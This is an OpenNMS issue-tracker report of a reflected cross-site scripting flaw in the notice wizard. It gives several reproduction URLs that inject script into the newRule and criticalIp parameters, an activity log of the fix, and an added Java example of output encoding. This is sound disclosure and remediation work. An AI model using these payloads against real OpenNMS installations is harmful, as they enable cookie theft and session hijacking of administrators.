Reflected XSS in webapp notice wizard

Description

A customer's internal pen-testing has identified a reflected cross-site scripting vulnerability in the notice wizard flow of the main OpenNMS webapp.

Steps to reproduce:

1) Log in as an admin user
2) Paste the following primary attack URL into your browser's address bar, substituting protocol, hostname, and port as needed:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildPathOutage.jsp?newRule=IPADDR+IPLIKE+*.*.*.*%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e&showNodes=on]

Expected result: A weird-looking rule renders into the filter rule input
Actual result: JS popup dumping the user's cookies

3) Paste the following secondary attack URL into your browser's address bar, adjusted as needed:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildPathOutage.jsp?newRule=IPADDR+IPLIKE+*.*.*.*]"><h1><a/href=javascript:alert(document.cookie)>Click Here!!!</a></h1>&showNodes=on]

Expected result: A weird-looking rule renders into the filter rule input
Actual result: Weird-looking rule renders, followed by a hyperlink which, when clicked, results in a JS popup dumping the user's cookies

4) From the Admin menu, click on Configure Notifications -> Configure Event Notifications. Click the "Add New Event Notification" button (these preliminary steps populate the necessary objects in the user's web session to set up the attack). Then, paste the following attack URL into your browser's address bar, adjusted as needed:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildPathOutage.jsp?newRule=IPADDR+IPLIKE+*.*.*.*&criticalIp=1.2.3.4%27%3e%3cscript%3ealert(document.cookie)%3c/script%3e&showNodes=on]

Expected result: A weird-looking value renders into the "Critical Path IP Address"
Actual result: JS popup dumping the user's cookies

5) Paste the following attack URL into your browser's address bar:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildRule.jsp?newRule=IPADDR+IPLIKE+*.*.*.*%22]><script>alert(document.cookie)</script>

Expected result: Weirdness in the filter rule input field
Actual result: JS popup dumping the user's cookies

Acceptance / Success Criteria

None
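The reproduction URLs in this report work because a request parameter is written back into the page without output encoding. The following is an added example, not OpenNMS code and not the merged fix: a minimal HTML encoder applied to parameter values copied from this report (including the follow-on `validatePathOutage.jsp` value from the activity log). The markup strings around each value, the class name and the helper names are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

public class NoticeWizardEncodingDemo {

    // Replace every character that can close a quoted attribute or start a tag.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // True when no markup-significant character of the value is left unencoded.
    static boolean inert(String s) {
        return s.chars().noneMatch(c -> c == '<' || c == '>' || c == '"' || c == '\'');
    }

    public static void main(String[] args) {
        // {assumed markup around the echoed value, raw query value copied from this report}
        String[][] cases = {
            {"<input name=\"newRule\" value=\"%s\"/>",
             "IPADDR+IPLIKE+*.*.*.*%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e"},
            {"<input name='criticalIp' value='%s'/>",
             "1.2.3.4%27%3e%3cscript%3ealert(document.cookie)%3c/script%3e"},
            {"<td>%s</td>",
             "(IPADDR+IPLIKE+*.*.*.*)%3C%3CSCRIPT%3Ealert(document.cookie);//%3C%3C/SCRIPT%3E"},
        };
        for (String[] c : cases) {
            // The servlet container URL-decodes the parameter before the JSP reads it (Java 10+ API).
            String value = URLDecoder.decode(c[1], StandardCharsets.UTF_8);
            String encoded = escapeHtml(value);
            System.out.println("unencoded: " + String.format(c[0], value));
            System.out.println("encoded  : " + String.format(c[0], encoded));
            if (inert(value) || !inert(encoded)) {
                throw new IllegalStateException("unexpected result for " + c[1]);
            }
        }
        System.out.println("all three values are inert once encoded");
    }
}
```

In a JSP the same encoding is available through JSTL's `<c:out>` tag or the `fn:escapeXml()` function, so a hand-written encoder like this one is only needed for illustration.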

Activity

Benjamin Reed November 9, 2021 at 4:22 PM

This got merged, re-closing.

Jeff Gehlbach August 23, 2021 at 3:47 PM

Jeff Gehlbach August 23, 2021 at 3:44 PM

Reopening after receiving and reproducing a follow-on report of an additional attack vector via attack URL:

http://localhost:8980/opennms/admin/notification/noticeWizard/validatePathOutage.jsp?newRule=(IPADDR+IPLIKE+*.*.*.*)%3C%3CSCRIPT%3Ealert(document.cookie);//%3C%3C/SCRIPT%3E&criticalSvc=ICMP&showNodes=on

Jeff Gehlbach August 10, 2021 at 3:15 PM

PR merged.

Jeff Gehlbach August 6, 2021 at 8:16 PM
Edited

Fixed

Details

Docs Needed

No

Created August 6, 2021 at 8:11 PM
Updated June 21, 2023 at 7:48 PM
Resolved November 9, 2021 at 4:22 PM
